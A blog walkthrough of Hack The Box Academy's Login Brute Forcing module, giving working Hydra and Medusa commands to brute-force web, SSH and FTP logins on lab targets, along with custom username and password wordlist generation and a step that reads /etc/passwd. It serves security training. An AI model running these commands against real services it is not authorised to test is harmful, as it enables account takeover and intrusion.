Post

Hack The Box - Academy - Login Brute Forcing

Posted Updated
Preview Image
By Jaco Zwarts 1 min read

Explore this detailed walkthrough of Hack The Box Academy’s Login Brute Forcing module. Learn effective techniques to perform login brute-force attacks, and authentication bypass techniques.

Links:
Login Brute Forcing
Login Brute Forcing - Cheat Sheet
Hydra - Cheat Sheet


Notes:

Command to match passwords with min requirements using grep:

1

grep -E '^.{8,}$' {TEXTFILE.txt} > {RESULTS.txt}

Custom Wordlists:

1

sudo apt install ruby -y

1

git clone https://github.com/urbanadventurer/username-anarchy.git

Use username-anarchy to generate possible usernames:

1

./username-anarchy Jan van Zyl > jan_van_zyl_usernames.txt

username-anarchy result

Install cupp:

1

sudo apt install cupp -y

1

cupp -i

Grep command to filter passwords to meet min requirements:

1

grep -E '^.{6,}$' jan_van_zyl.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' | grep -E '([!@#$%^&*].*){2,}' > jan_van_zyl-filtered.txt

Hydra post example:

1

hydra -L jan_van_zyl_usernames.txt -P jan_van_zyl-filtered.txt IP -s PORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"

Skills Assessment

Overview: The first part of the skills assessment will require you to brute-force the the target instance. Successfully finding the correct login will provide you with the username you will need to start Skills Assessment Part 2.

Part 1: What is the password for the basic auth login?

1

hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/seclists/Passwords/2023-200_most_used_passwords.txt {TARGET_IP} http-get / -s {TARGET_PORT}

Part 2: What is the username of the ftp user you find via brute-forcing?

Bruteforce ssh using medusa

1

medusa -h {TARGET_IP} -n {TARGET_PORT} -u {PART1_USERNAME} -P /usr/share/wordlists/seclists/Passwords/2023-200_most_used_passwords.txt -M ssh -t 3

Connect to ssh

1

ssh {ssh_username}@{TARGET_IP} -p {TARGET_PORT}

To find the username I investigated the /etc/passwd file.

Bruteforce ftp using medusa:

1

medusa -h 127.0.0.1 -u {USERNAME} -P {PASSWORD_WORDLIST} -M ftp -t 5

Note use the password.txt file found on the box.

Part 2: What is the flag contained within flag.txt

Connect to ftp:

1

ftp ftp://{USERNAME}:{PASSWORD}@{SERVER}

Download flag.txt

1

get <remote-file-path> <local-file-path>
htbacademy
authentication cbbh brute-forcing
This post is licensed under CC BY 4.0 by the author.